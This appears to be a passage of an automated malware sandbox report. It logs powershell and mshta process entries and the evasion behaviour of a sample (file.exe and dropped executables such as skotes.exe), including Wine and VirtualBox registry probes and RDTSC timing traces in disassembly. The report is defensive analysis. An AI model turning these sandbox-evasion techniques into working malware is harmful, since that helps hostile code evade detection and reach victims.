Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_0-10413
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_56-9684
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess	graph_1-9697

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF598 second address: FCF59D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF59D second address: FCF5AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF5AC second address: FCF5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF5B2 second address: FCF5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF5B7 second address: FCEE4C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCC24D2113Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b stc 0x0000000c push dword ptr [ebp+122D0865h] 0x00000012 jmp 00007FCC24D2113Ah 0x00000017 call dword ptr [ebp+122D2731h] 0x0000001d pushad 0x0000001e jno 00007FCC24D2113Ch 0x00000024 xor eax, eax 0x00000026 cmc 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c mov ebx, dword ptr [ebp+122D2EB3h] 0x00000032 call 00007FCC24D2113Bh 0x00000037 sub esi, dword ptr [ebp+122D2CCBh] 0x0000003d pop edx 0x0000003e popad 0x0000003f mov dword ptr [ebp+122D2E7Bh], eax 0x00000045 jo 00007FCC24D21137h 0x0000004b cmc 0x0000004c mov esi, 0000003Ch 0x00000051 mov dword ptr [ebp+122D3801h], esi 0x00000057 mov dword ptr [ebp+122D2B99h], ebx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 xor dword ptr [ebp+122D2BC0h], eax 0x00000067 mov dword ptr [ebp+122D2BC0h], edx 0x0000006d lodsw 0x0000006f jmp 00007FCC24D21144h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jmp 00007FCC24D2113Ch 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 jns 00007FCC24D21144h 0x00000087 nop 0x00000088 jns 00007FCC24D21157h 0x0000008e push eax 0x0000008f pushad 0x00000090 pushad 0x00000091 jmp 00007FCC24D2113Bh 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146C30 second address: 1146C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FCC24F8725Bh 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1146C47 second address: 1146C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114F535 second address: 114F543 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCC24F87258h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114F543 second address: 114F54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCC24D21136h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114FD4A second address: 114FD7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FCC24F87274h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152E25 second address: 1152ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FCC24D2113Dh 0x0000000a pop edx 0x0000000b popad 0x0000000c add dword ptr [esp], 4E33E700h 0x00000013 mov ecx, dword ptr [ebp+122D2CDBh] 0x00000019 push 00000003h 0x0000001b add dword ptr [ebp+122D2BA2h], edi 0x00000021 and ecx, dword ptr [ebp+122D1BE2h] 0x00000027 push 00000000h 0x00000029 movsx ecx, si 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FCC24D21138h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 pushad 0x00000049 jbe 00007FCC24D21144h 0x0000004f jmp 00007FCC24D2113Eh 0x00000054 mov edi, 30C0276Fh 0x00000059 popad 0x0000005a call 00007FCC24D21139h 0x0000005f jmp 00007FCC24D21147h 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jmp 00007FCC24D21148h 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152ED0 second address: 1152ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152ED5 second address: 1152EEA instructions: 0x00000000 rdtsc 0x00000002 je 00007FCC24D21138h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152EEA second address: 1152F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87269h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FCC24F87258h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 je 00007FCC24F87260h 0x0000001a jmp 00007FCC24F8725Ah 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FCC24F87264h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152F3D second address: 1152F41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152F41 second address: 1152F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FCC24F8725Ch 0x0000000c jo 00007FCC24F87256h 0x00000012 popad 0x00000013 pop eax 0x00000014 jng 00007FCC24F87259h 0x0000001a push edx 0x0000001b cmc 0x0000001c pop edi 0x0000001d lea ebx, dword ptr [ebp+12457CD9h] 0x00000023 jmp 00007FCC24F8725Dh 0x00000028 mov si, bx 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d jnp 00007FCC24F87258h 0x00000033 pushad 0x00000034 jc 00007FCC24F87256h 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FCC24F8725Dh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1152F99 second address: 1152FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FCC24D21136h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153045 second address: 115304C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115304C second address: 115305F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115305F second address: 1153065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153065 second address: 1153139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007FCC24D2114Fh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FCC24D21146h 0x00000017 pop eax 0x00000018 jg 00007FCC24D21138h 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FCC24D21138h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FCC24D21138h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 add si, A19Ch 0x0000005b push 00000003h 0x0000005d mov dword ptr [ebp+122D2B99h], ebx 0x00000063 call 00007FCC24D21139h 0x00000068 jmp 00007FCC24D2113Eh 0x0000006d push eax 0x0000006e jmp 00007FCC24D2113Bh 0x00000073 mov eax, dword ptr [esp+04h] 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007FCC24D21140h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153139 second address: 1153181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24F87266h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007FCC24F87269h 0x00000011 jnp 00007FCC24F87258h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153181 second address: 11531AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCC24D21140h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pop eax 0x0000000b movzx ecx, di 0x0000000e lea ebx, dword ptr [ebp+12457CE2h] 0x00000014 add dword ptr [ebp+122D2B99h], esi 0x0000001a push eax 0x0000001b push edi 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 115330A second address: 1153386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCC24F87268h 0x0000000c popad 0x0000000d add dword ptr [esp], 28D37F63h 0x00000014 mov edi, 7D5990ADh 0x00000019 lea ebx, dword ptr [ebp+12457CEDh] 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007FCC24F87258h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 add dword ptr [ebp+122D3A56h], ebx 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 jmp 00007FCC24F8725Bh 0x00000047 pop eax 0x00000048 pop eax 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FCC24F87262h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1153386 second address: 11533A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCC24D21146h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172F89 second address: 1172F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCC24F87256h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172F94 second address: 1172FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jmp 00007FCC24D21148h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172FB9 second address: 1172FC3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCC24F87262h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172FC3 second address: 1172FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCC24D21136h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113CC9F second address: 113CCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113CCA3 second address: 113CCA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171055 second address: 1171064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jc 00007FCC24F87256h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11711AD second address: 11711C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCC24D21141h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11711C3 second address: 11711CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11711CB second address: 11711CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117134F second address: 1171359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCC24F87256h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11714A3 second address: 11714BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007FCC24D2113Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11714BF second address: 11714C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11714C4 second address: 11714CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11714CC second address: 11714D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171636 second address: 117163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117163A second address: 117163E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117163E second address: 1171656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FCC24D2113Eh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171656 second address: 1171679 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCC24F8725Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jg 00007FCC24F8725Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171679 second address: 117167D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171D77 second address: 1171D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1171D7B second address: 1171D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
